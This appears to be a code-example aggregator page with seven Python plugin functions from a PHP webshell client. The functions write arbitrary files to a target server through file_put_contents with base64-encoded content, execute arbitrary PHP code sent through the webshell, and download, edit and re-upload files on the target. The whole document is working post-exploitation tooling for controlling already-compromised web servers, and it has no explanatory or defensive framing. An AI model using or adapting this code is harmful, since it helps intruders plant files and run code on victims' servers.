Ejemplo n.º 1
0
def run(web_file_path: str, editor: str = ""):
    """
    write

    Write files directly to the target system by notepad / vi as default or your own editor.

    eg: write {web_file_path} {editor=""}
    """
    file_name = str(uuid4())
    file_path = gget("webshell.download_path", "webshell")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name).replace("\\", "/")
    open(real_file_path, 'a').close()
    open_editor(real_file_path, editor)
    with open(real_file_path, "r") as f:
        result = base64_encode(f.read())
        res = send(
            f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
        )
        if (not res):
            return
        text = res.r_text.strip()
        if (match(r"\d+", text)):
            print(color.green(f"\nWrite {web_file_path} success.\n"))
        else:
            print(color.red(f"\nWrite {web_file_path} failed.\n"))
    remove(real_file_path)
Ejemplo n.º 2
0
def run(editor: str = ""):
    """
    execute

    execute Custom PHP code by notepad / vi as default or your own editor.

    eg: execute {editor=""}
    """
    file_name = str(uuid4())
    file_path = gget("webshell.download_path", "webshell")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name).replace("\\", "/")
    open(real_file_path, "a").close()
    open_editor(real_file_path, editor)
    with open(real_file_path, "r") as f:
        code = f.read()
        if (code.startswith("<?php")):
            code = code[5:]
        if (code.endswith("?>")):
            code = code[:-2]
        print(color.yellow("Execute php code..."))
        res = send(code)
        if (not res):
            return
        text = res.r_text.strip()
        status_code = color.green(str(
            res.status_code)) if res.status_code == 200 else color.yellow(
                str(res.status_code))
        print(
            f"\n{color.green('Result:')}\n[{status_code}] {color.cyan('length')}: {len(text)} \n{text}\n"
        )
    remove(real_file_path)
Ejemplo n.º 3
0
def run(web_file_path: str):
    """
    write

    Write files directly to the target system by notepad/vi.

    eg: write {web_file_path}
    """
    file_name = path.split(web_file_path)[1]
    file_path = gget("webshell.download_path", "webshell").replace(":", "_")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name)
    with open(real_file_path, "w"):
        pass
    open_editor(real_file_path)
    with open(real_file_path, "r") as f:
        result = base64_encode(f.read())
        res = send(
            f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
        )
        if (not res):
            return
        text = res.r_text.strip()
        if (match(r"\w+", text) and text != '0'):
            print(color.green(f"\nWrite {web_file_path} success.\n"))
        else:
            print(
                color.red(f"\nWrite {web_file_path} failed.") +
                color.yellow("\n\nResponse:") + f"\n{text}\n")
    remove(real_file_path)
Ejemplo n.º 4
0
def run():
    """
    execute

    execute Custom PHP code by notepad/vi.

    eg: execute
    """
    file_name = "tmp" + str(uuid4())
    file_path = gget("webshell.download_path", "webshell").replace(":", "_")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name)
    with open(real_file_path, "w"):
        pass
    open_editor(real_file_path)
    with open(real_file_path, "r") as f:
        code = f.read().strip("<?php").strip("?>")
        print(color.yellow("Execute php code..."))
        res = send(code)
        if (not res):
            return
        text = res.r_text.strip()
        print(color.green("\nResult:\n") + text + "\n")
    remove(real_file_path)
Ejemplo n.º 5
0
def run(editor: str = ""):
    """
    execute

    execute Custom PHP code by notepad / vi as default or your own editor.

    eg: execute {editor=""}
    """
    file_name = str(uuid4())
    file_path = gget("webshell.download_path", "webshell")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name).replace("\\", "/")
    open(real_file_path, "a").close()
    open_editor(real_file_path, editor)
    with open(real_file_path, "r") as f:
        code = f.read().strip("<?php").strip("?>")
        print(color.yellow("Execute php code..."))
        res = send(code)
        if (not res):
            return
        text = res.r_text.strip()
        print(color.green("\nResult:\n") + text + "\n")
    remove(real_file_path)
Ejemplo n.º 6
0
def run(web_file_path: str, editor: str = ""):
    """
    edit

    edit file from target system (download->edit->upload) by notepad / vi as default or your own editor.

    eg: edit {web_file_path} {editor=""}
    """
    webshell_pf = gget("webshell.pf")
    download_file_path = webshell_pf["download"].run(web_file_path)
    if (not download_file_path):
        return
    flag = open_editor(download_file_path, editor)
    if (not flag):
        print("\n" + color.red(f"Call {editor} failed") + "\n")
        return
    webshell_pf["upload"].run(download_file_path, web_file_path, True)
Ejemplo n.º 7
0
def run(web_file_path: str):
    """
    edit

    edit file from target system (download->edit->upload) by notepad/vi.

    eg: edit {web_file_path}
    """
    webshell_pf = gget("webshell.pf")
    download_file_path = webshell_pf["download"].run(web_file_path)
    if (not download_file_path):
        return
    flag = open_editor(download_file_path)
    if (not flag):
        print("\n" + color.red("Call vi / notepad failed") + "\n")
        return
    webshell_pf["upload"].run(download_file_path, web_file_path, True)